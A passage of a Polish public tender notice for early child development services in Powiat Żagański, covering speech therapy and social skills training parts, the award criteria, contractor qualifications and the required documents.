wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">22.5.	Zamawiający wybierze ofertę, która przedstawia najkorzystniejszy bilans (maksymalna liczba punktów przyznanych w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.4.3.	CZĘŚĆ III – PROWADZENIE ZAJĘĆ NEUROLOGOPEDYCZNYCH <br/>I SURDOLOGOPEDYCZNYCH<br/>a) Przedmiotem zamówienia jest prowadzenie zajęć neurologopedycznych <br/>i surdologopedycznych w szacunkowej ilości i w podziale na lata:<br/>a.1) w roku 2023 - około 200h zegarowych (60 min), nie więcej niż 60h/m-c <br/>a.2) w roku 2024 - około 200h zegarowych (60 min) ), nie więcej niż 25h/m-c<br/>a.3) w roku 2025 - około 200h zegarowych (60 min) ), nie więcej niż 25h/m-c<br/>a.4) w roku 2026 - około 200h zegarowych (60 min) ), nie więcej niż 25h/m-c<br/>dla dzieci w wieku od 0 do czasu podjęcia nauki w szkole podstawowej skierowanych przez Poradnię Psychologiczno – Pedagogiczną w Żaganiu wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem” (zadanie 2.4, Priorytet II programu: Wczesne wspomaganie rozwoju dziecka i jego rodziny).;<br/>a.5) Określenie ilości godzin jest ilością szacowaną i służy do wyliczenia ceny oferty i porównania złożonych ofert. Wynagrodzenie za zrealizowanie przedmiotu umowy będzie następować miesięcznie poprzez fatyczną, zrealizowaną ilość godzin w danym miesiącu. <br/>Za niezrealizowaną szacowaną ilość godzin nie będzie Wykonawcy przysługiwało żadne roszczenie z tego tytułu, z zastrzeżeniem lit.a.6) poniżej.<br/>a.6) minimalny zakres świadczenia w podziale na lata wynosi:<br/>- w roku 2023 - 25h zegarowych (60 min), <br/>- w roku 2024 - 50h zegarowych (60 min), <br/>- w roku 2025 - 50h zegarowych (60 min), <br/>- w roku 2026 - 50h zegarowych (60 min),<br/><br/>b) Do obowiązków Wykonawcy będzie należeć w szczególności:<br/>b.1)	prowadzenie zajęć neurologopedycznych i surdologopedycznych na podstawie opinii o Wczesnym Wspomaganiu Rozwoju;<br/>b.2) prowadzenie dokumentacji, m.in. karty pracy specjalisty ((na koniec miesiąca rozliczeniowego), karty pracy z klientem (na koniec każdego turnusu określonego w pkt. c));<br/>b.3) prowadzenie rejestru przyjętych osób;<br/>b.4) wykonania czynności będących przedmiotem umowy z należytą starannością;<br/>b.5) czuwaniem nad prawidłową realizacją niniejszego zamówienia;<br/>b.6)	przedkładania Zamawiającemu do 5-go dnia po miesiącu rozliczeniowym zestawienia z zrealizowanych zajęć, z uwzględnieniem: liczby godzin przeznaczonym na usługę i liczby osób, które z niej skorzystały (oprócz rozliczenia grudniowego, które musi wpłynąć do 20 grudnia danego roku);<br/>b.7) w razie zaistnienia potrzeby współpraca z innymi instytucjami czy podmiotami;<br/>b.8) w ramach niniejszej usługi Wykonawca jest zobligowanych do brania udziału w spotkaniach i konsultacjach zespołowych organizowanych dla rodziców/opiekunów prawnych (na wniosek Zamawiającego z uzgodnionym odpowiednio wcześniej terminem)<br/><br/>c) Planowany harmonogram zajęć zostanie podzielony na następujące Turnusy<br/> c.1) I turnus – od dnia zawarcia umowy do 31.12.2023r.<br/> c.2) II turnus – od 01.01.2024r. do 30.06.2024r.<br/> c.3) III turnus – od 01.07.2024r. do 31.12.2024r.<br/> c.4) IV turnus – od 01.01.2025r. do 30.06.2025r.<br/> c.5) V turnus – od 01.07.2025r. do 31.12.2025r.<br/> c.6) VI turnus – od 01.01.2026r. do 30.06.2026r.<br/> c.7) VII turnus – od 01.07.2026r. do 31.12.2026r.<br/><br/>d) Ilość dzieci objętych wsparciem ma charakter „otwarty” i zostanie wskazana przez Poradnię Psychologiczno – Pedagogiczną (PPP) w Żaganiu przed rozpoczęciem każdego z turnusu zgodnie z regulaminem udzielania wsparcia dla rodzin.<br/><br/>e) Realizacja niniejszej usługi będzie następować w ramach własnego „gabinetu” posiadającego wymagane prawem atesty, pozwolenia, certyfikaty etc. i spełniającego wymogi określone przepisami prawa, w tym bhp, który mieści się na terenie Powiatu Żagańskiego, <br/>LUB w domu „klienta” w zależności od potrzeb - na terenie Powiatu Żagańskiego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80340000-9 - Usługi edukacji specjalnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">22.5.	Zamawiający wybierze ofertę, która przedstawia najkorzystniejszy bilans (maksymalna liczba punktów przyznanych w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 7.4.4.	CZĘŚĆ IV – PROWADZENIE ZAJĘĆ TRENINGU UMIEJĘTNOŚCI SPOŁECZNYCH (TUS)<br/>a) Przedmiotem zamówienia jest prowadzenie zajęć TUS w szacunkowej ilości i w podziale na lata:<br/>a.1) w roku 2023 - około 200h zegarowych (60 min) nie więcej niż 60h/m-c <br/>a.2) w roku 2024 - około 200h zegarowych (60 min) nie więcej niż 25h/m-c <br/>a.3) w roku 2025 - około 200h zegarowych (60 min) nie więcej niż 25h/m-c <br/>a.4) w roku 2026 - około 200h zegarowych (60 min nie więcej niż 25h/m-c <br/>dla dzieci w wieku od 0 do czasu podjęcia nauki w szkole podstawowej skierowanych przez Poradnię Psychologiczno – Pedagogiczną w Żaganiu wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem” (zadanie 2.4, Priorytet II programu: Wczesne wspomaganie rozwoju dziecka i jego rodziny).;<br/>a.5) Określenie ilości godzin jest ilością szacowaną i służy do wyliczenia ceny oferty i porównania złożonych ofert. Wynagrodzenie za zrealizowanie przedmiotu umowy będzie następować miesięcznie poprzez fatyczną, zrealizowaną ilość godzin w danym miesiącu. <br/>Za niezrealizowaną szacowaną ilość godzin nie będzie Wykonawcy przysługiwało żadne roszczenie z tego tytułu, z zastrzeżeniem lit.a.6) poniżej.<br/>a.6) minimalny zakres świadczenia w podziale na lata wynosi:<br/>- w roku 2023 - 25h zegarowych (60 min), <br/>- w roku 2024 - 50h zegarowych (60 min), <br/>- w roku 2025 - 50h zegarowych (60 min), <br/>- w roku 2026 - 50h zegarowych (60 min),<br/><br/>b) Do obowiązków Wykonawcy będzie należeć w szczególności:<br/>b.1)	prowadzenie zajeść hipoterapii na podstawie opinii o Wczesnym Wspomaganiu Rozwoju;<br/>b.2) prowadzenie dokumentacji, m.in. karty pracy specjalisty ((na koniec miesiąca rozliczeniowego), karty pracy z klientem (na koniec każdego turnusu określonego w pkt. c));<br/>b.3) prowadzenie rejestru przyjętych osób;<br/>b.4) wykonania czynności będących przedmiotem umowy z należytą starannością;<br/>b.5) czuwaniem nad prawidłową realizacją niniejszego zamówienia;<br/>b.6)	przedkładania Zamawiającemu do 5-go dnia, po miesiącu rozliczeniowym zestawienia z zrealizowanych zajęć, z uwzględnieniem: liczby godzin przeznaczonym na usługę i liczby osób, które z niej skorzystały (oprócz rozliczenia grudniowego, które musi wpłynąć do 20 grudnia danego roku);<br/>b.7) w razie zaistnienia potrzeby współpraca z innymi instytucjami czy podmiotami;<br/>b.8) w ramach niniejszej usługi Wykonawca jest zobligowanych do brania udziału w spotkaniach i konsultacjach zespołowych organizowanych dla rodziców/opiekunów prawnych (na wniosek Zamawiającego z uzgodnionym odpowiednio wcześniej terminem)<br/><br/>c) Planowany harmonogram zajęć zostanie podzielony na następujące Turnusy:<br/> c.1) I turnus – od dnia zawarcia umowy do 20.12.2023r.<br/> c.2) II turnus – od 01.01.2024r. do 30.06.2024r.<br/> c.3) III turnus – od 01.07.2024r. do 20.12.2024r.<br/> c.4) IV turnus – od 01.01.2025r. do 30.06.2025r.<br/> c.5) V turnus – od 01.07.2025r. do 20.12.2025r.<br/> c.6) VI turnus – od 01.01.2026r. do 30.06.2026r.<br/> c.7) VII turnus – od 01.07.2026r. do 20.12.2026r.<br/><br/>d) Ilość dzieci objętych wsparciem ma charakter „otwarty” i zostanie wskazana przez Poradnię Psychologiczno – Pedagogiczną (PPP) w Żaganiu przed rozpoczęciem każdego z turnusu zgodnie z regulaminem udzielania wsparcia dla rodzin.<br/><br/>e) Realizacja niniejszej usługi będzie następować w ramach własnego „gabinetu” posiadającego wymagane prawem atesty, pozwolenia, certyfikaty etc. i spełniającego wymogi określone przepisami prawa, w tym bhp, który mieści się na terenie Powiatu Żagańskiego, <br/>LUB w domu „klienta” w zależności od potrzeb - na terenie Powiatu Żagańskiego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80340000-9 - Usługi edukacji specjalnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">22.5.	Zamawiający wybierze ofertę, która przedstawia najkorzystniejszy bilans (maksymalna liczba punktów przyznanych w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 10.	INFORMACJE O WARUNKACH UDZIAŁU W POSTĘPOWANIU <br/>10.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>10.1.1.	nie podlegają wykluczeniu;<br/>10.1.2.	spełniają warunki udziału w postępowaniu.<br/><br/>10.2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają poniżej wskazane przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/><br/>10.2.1.	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w tym zakresie (dla każdej z części)<br/><br/>10.2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile to wynika z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w tym zakresie (dla każdej z części)<br/><br/>10.2.3.	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie stawia warunku w tym zakresie (dla każdej z części)<br/><br/>10.2.4.	zdolności technicznej lub zawodowej:<br/>CZĘŚĆ I<br/>10.2.4.1.	Zamawiający żąda, aby Wykonawca wskazał: <br/>a) minimum 1 osobę, która będzie uczestniczyć w wykonywaniu przedmiotu zamówienia posiadającą ukończony kurs zawodowy instruktor hipoterapii lub instruktor rekreacji ruchowej ze specjalnością hipoterapia i ukończone studia kierunkowe fizjoterapia lub psychologia lub pedagogika WRAZ<br/>z doświadczeniem wykonania min. 1 usługi polegającej na prowadzeniu zajęć hipoterapii <br/>z dziećmi w wieku od 0-6 lat, w okresie ostatnich 3-ch lat (przed wszczęciem postępowania)<br/>UWAGA!<br/>1/ W przypadku składania oferty przez podmioty występujące wspólnie, warunek może być spełniony przez kilka podmiotów łącznie.<br/><br/>CZĘŚĆ II<br/>10.2.4.2.	Zamawiający żąda, aby Wykonawca wskazał: <br/>a) minimum 1 osobę, która będzie uczestniczyć w wykonywaniu przedmiotu zamówienia posiadającą dyplom studiów magisterskich na kierunku fizjoterapia WRAZ<br/>z doświadczeniem w wykonaniu min 1 usługi polegającej na prowadzeniu zajęć o charakterze terapeutycznym (lub zajęć specjalistycznych) z zakresu fizjoterapii z dziećmi w wieku od 0-6 lat, w okresie ostatnich 3-ch lat (przed wszczęciem postępowania)<br/>UWAGA!<br/>1/ W przypadku składania oferty przez podmioty występujące wspólnie, warunek może być spełniony przez kilka podmiotów łącznie.<br/><br/>CZĘŚĆ III<br/>10.2.4.3.	Zamawiający żąda, aby Wykonawca wskazał: <br/>a) minimum 1 osobę, która będą uczestniczyć w wykonywaniu przedmiotu zamówienia posiadającą dyplom studiów podyplomowych, z zakresu neurologopedii i dyplom studiów z zakresu surdologopedii, WRAZ<br/>z doświadczeniem w wykonaniu min 1 usługi polegającej na prowadzeniu zajęć terapeutycznym w zakresie neurologopedii i surdologopedii z dziećmi w wieku od 0-6, w okresie ostatnich 3-ch lat, (przed wszczęciem postępowania) w ramach jednej łącznej umowy lub odrębnych umów dla zajęć neurologopedii i surdologopedii .<br/>UWAGA!<br/>1/ W przypadku składania oferty przez podmioty występujące wspólnie, warunek może być spełniony przez kilka podmiotów łącznie.<br/><br/>CZĘŚĆ IV<br/>10.2.4.4.	Zamawiający żąda, aby Wykonawca wskazał: <br/>a) minimum 1 osobę, która będzie uczestniczyć w wykonywaniu przedmiotu zamówienia posiadającą ukończony kurs/ szkolenie itp. uprawniający do pracy jako Trener Umiejętności Społecznych WRAZ <br/>z doświadczeniem wykonania min. 1 usługi polegającej na prowadzeniu zajęć z treningu umiejętności społecznych w okresie ostatnich 3-ch lat przed wszczęciem postępowania.<br/>UWAGA!<br/>1/ W przypadku składania oferty przez podmioty występujące wspólnie, warunek może być spełniony przez kilka podmiotów łącznie.<br/><br/><br/>10.2.4.5.	Oceniając zdolność techniczną lub zawodową, Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">11.2.2.	Potwierdzenie braku podstaw wykluczenia<br/>11.2.2.1.	W celu potwierdzenia braku podstaw wykluczenia przez Wykonawcę <br/>z postępowania (zgodnie z zapisami w pkt 9 SWZ Wykonawca przedłoży:<br/>a)	Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2020 r. poz. 1076 z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej grupy kapitałowej stanowi formularz 3.2. do SWZ),<br/><br/>11.3.	Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/><br/>11.4.	Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ppkt 11.2.2.1. lit b) SWZ i Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, O ILE WYKONAWCA WSKAZAŁ w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp dane umożliwiające dostęp do tych środków. <br/><br/>11.5.	Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w ppkt 11.2.2.1 lit b) SWZ, Zamawiający może żądać od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy. Przepisy te stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.<br/><br/>11.6.	W przypadku wskazania przez Wykonawcę dostępności podmiotowych środków dowodowych lub dokumentów, o których mowa w ppkt 11.2.2.1 lit b) SWZ pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, Zamawiający może żądać od Wykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie przez Zamawiającego podmiotowych środków dowodowych lub dokumentów. <br/><br/>11.7.	Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę lub Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia. <br/>WYKONAWCY ZAGRANICZNI - wykaz podmiotowych śr. dowodowych na potwierdzenie nie podlegania wykluczeniu dla Wykonawców mających siedzibę lub miejsce zamieszkania poza granicami RP został ujęty odpowiednio w pkt. 11 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">11.1.	Do oferty Wykonawca dołącza aktualne na dzień składania ofert Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu, spełnieniu warunków udziału w postępowaniu stanowiące dowód tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe, potwierdzające, że Wykonawca: - formularz 2.1.<br/>- nie podlegają wykluczeniu, <br/>- spełniania warunków udziału w postępowaniu.<br/>11.2.	Na wezwanie Zamawiającego Wykonawca zobowiązany jest do złożenia następujących oświadczeń lub dokumentów na:<br/><br/>11.2.1.	Potwierdzenie spełnienia warunków udziału w postępowaniu<br/><br/>11.2.1.1.	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału <br/>w postępowaniu dotyczących zdolności technicznej i zawodowej: (zgodnie z warunkami opisanymi w ppkt 10.2.4.2 SWZ) Wykonawca przedłoży:<br/>a)	Zamawiający żąda, przedłożenia przez Wykonawcę WYKAZU OSÓB skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usługi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie dysponowania tymi osobami- wg treści odpowiednio formularza 3.3.a), 3.3.b), 3.3.c), 3.3.d) , w zakresie danej części, do SWZ<br/>(W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument powinien potwierdzać spełnienie warunków przynajmniej przez jednego ze współpartnerów)</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 18.2.	Ofertę stanowi wypełniony interaktywny „Formularz ofertowy” udostępniony przez Zamawiającego na Platformie e-Zamówienia wraz z „Formularzem cenowym” w zakresie składanej części.<br/>18.3.	Wraz z ofertą Wykonawca zobowiązany jest złożyć za pośrednictwem Platformy:<br/>1) Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp<br/>2)	Zobowiązanie podmiotu udostępniającego zasoby, w przypadku, gdy Wykonawca polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej tych podmiotów w celu potwierdzenia spełniania warunków udziału w postępowaniu lub braku podstaw wykluczenia. (jeżeli dotyczy)<br/>3) Pełnomocnictwo do reprezentowania Wykonawcy bądź do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo winno być sporządzone w oryginale w postaci elektronicznej i opatrzone odpowiednio kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez Mocodawcę lub notarialnie potwierdzona „kopia” cyfrowe odwzorowanie tego dokumentu za „zgodność z oryginałem” przez Notariusza (jeżeli dotyczy)<br/>4) Dokumenty, z których wynika prawo do podpisania oferty (oryginał w postaci dokumentu elektronicznego) względnie do podpisania innych oświadczeń lub dokumentów składanych wraz z ofertą, chyba, że Zamawiający może je uzyskać w szczególności za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy o informatyzacji działalności podmiotów realizujących zadania publiczne , a Wykonawca wskazał to wraz ze złożeniem oferty. <br/>5) Oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz, z uwzględnieniem postanowień niniejszej SWZ. (jeżeli jest wymagane wniesienie wadium w danym postępowaniu)<br/>6) Uzasadnienie zastrzeżenia informacji jako Tajemnicy przedsiębiorstwa, o ile zastrzeżenie takie zostało złożone.<br/>7) Równoważne przedmiotowe środki dowodowe, jeżeli Wykonawca powołuje się na rozwiązania równoważne. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 14.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>14.2.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie <br/>o którym mowa w ust. 14.6 składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postepowaniu.<br/>14.3.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp (jeżeli Zamawiający wymaga takiego warunku) jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. <br/>14.4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (jeżeli Zamawiający wymaga takiego warunku) Wykonawcy wspólnie ubiegających się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonują roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>14.4.1.	Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, dostaw lub usług, wykonywanych wspólnie z innymi Wykonawcami, wykaz odpowiednio:<br/>a)	o którym mowa w §9 ust. 1 pkt. 1 Rozporządzenia Ministra Rozwoju, pracy i technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawców, dotyczy robót budowlanych, w których wykonywaniu Wykonawca ten bezpośrednio uczestniczył;<br/>b)	o którym mowa w §9 ust. 1 pkt 2 Rozporządzenia Ministra Rozwoju, pracy i technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawców, dotyczy dostaw lub usług, w których wykonywaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>14.4.2.	Zamawiający informuje o treści przepisu art. 117 ust. 3 Pzp, zgodnie z którym w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>14.5.	W przypadku, o którym mowa w pkt 14.3 i 14.4 SWZ Wykonawcy wspólnie ubiegający się <br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni wykonawcy.<br/>14.6.	Oświadczenie wstępne, o którym mowa w art. 125 ust. 1 ustawy Pzp, SKŁADA KAŻDY <br/>z Wykonawców wspólnie ubiegających się o zamówienie, potwierdzając tym samym brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu. <br/>14.7.	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>14.8.	Zgodnie z 